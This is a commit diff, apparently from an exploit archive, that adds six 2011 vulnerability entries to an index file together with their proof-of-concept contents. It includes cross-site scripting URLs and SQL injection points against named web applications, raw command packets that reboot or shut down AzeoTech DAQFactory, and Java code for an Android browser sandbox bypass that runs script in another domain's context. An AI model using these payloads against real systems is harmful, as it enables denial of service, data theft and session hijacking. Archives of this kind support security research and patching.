Update: 2015-02-08

6 new exploits
2015-02-08 08:36:08 +00:00 · 2015-02-08 08:36:08 +00:00 · 4b9d336b5c
commit 4b9d336b5c
parent 783274a13b
7 changed files with 90 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -32447,3 +32447,9 @@ id,file,description,date,author,platform,type,port
 36003,platforms/php/webapps/36003.txt,"Curverider Elgg <= 1.7.9 Multiple Cross Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0
 36004,platforms/multiple/remote/36004.txt,"Skype <= 5.3 'Mobile Phone' Field HTML Injection Vulnerability",2011-08-01,noptrix,multiple,remote,0
 36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin 'tab' Parameter SQL Injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
 36006,platforms/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 Browser Sandbox Security Bypass Vulnerability",2011-08-02,"Roee Hay",multiple,remote,0
 36007,platforms/multiple/dos/36007.txt,"AzeoTech DAQFactory Denial of Service Vulnerability",2011-06-24,"Knud Erik Hojgaard",multiple,dos,0
 36008,platforms/php/webapps/36008.txt,"Gilnet News 'read_more.php' SQL Injection Vulnerability",2011-07-11,Err0R,php,webapps,0
 36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank 'b' Parameter Cross Site Scripting Vulnerability",2011-08-03,Err0R,php,webapps,0
 36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL 'sayfa.asp' Cross Site Scripting Vulnerability",2011-08-03,Err0R,asp,webapps,0
 36011,platforms/asp/webapps/36011.txt,"Ataccan E-ticaret Scripti 'id' Parameter SQL Injection Vulnerability",2011-08-03,Err0R,asp,webapps,0
--- a/platforms/asp/webapps/36010.txt
+++ b/platforms/asp/webapps/36010.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/48969/info
 BESNI OKUL PORTAL is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
 http://www.example.com/[PATH]/sayfa.asp?islem=1&AltKategoriNo=42&AltKategoriAdi=<script>alert(document.domain)</script> 
--- a/platforms/asp/webapps/36011.txt
+++ b/platforms/asp/webapps/36011.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/48970/info
 Ataccan E-ticaret scripti is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
 http://www.example.com/name.asp?id=[SQLInjection] 
--- a/platforms/multiple/dos/36007.txt
+++ b/platforms/multiple/dos/36007.txt
@ -0,0 +1,20 @@
 source: http://www.securityfocus.com/bid/48955/info
 AzeoTech DAQFactory is prone to a denial-of-service vulnerability.
 Attackers can exploit this issue to cause the application to crash, denying service to legitimate users.
 Versions prior to DAQFactory 5.85 are vulnerable. 
 The following exploit requests are available:
 preamble:
 "\x01\x00\x09\x00CPassword\x00"
 reboot:
 "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
 shutdown:
 "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"
--- a/platforms/multiple/remote/36006.java
+++ b/platforms/multiple/remote/36006.java
@ -0,0 +1,36 @@
 source: http://www.securityfocus.com/bid/48954/info
 Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox.
 Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.
 Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected. 
 public class CasExploit extends Activity
 {
   static final String mPackage = "com.android.browser";
   static final String mClass = "BrowserActivity";
   static final String mUrl = "http://target.domain/";;
   static final String mJavascript = "alert(document.cookie)";
   static final int mSleep = 15000;
   @Override
   public void onCreate(Bundle savedInstanceState) {
      super.onCreate(savedInstanceState);
      setContentView(R.layout.main);
      startBrowserActivity(mUrl);
         try {
             Thread.sleep(mSleep);
         }
         catch (InterruptedException e) {}
         startBrowserActivity("javascript:" + mJavascript);
   }
   private void startBrowserActivity(String url) {
      Intent res = new Intent("android.intent.action.VIEW");
      res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
      res.setData(Uri.parse(url));
      startActivity(res);
   }
 }
--- a/platforms/php/webapps/36008.txt
+++ b/platforms/php/webapps/36008.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/48966/info
 Gilnet News is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. 
 http://www.example.com/[PATH]/read_more.php?id=[Injection] 
--- a/platforms/php/webapps/36009.txt
+++ b/platforms/php/webapps/36009.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/48967/info
 mt LinkDatenbank is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
 http://www.example.com/mt_linkdb/links.php?b=%22%3E%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E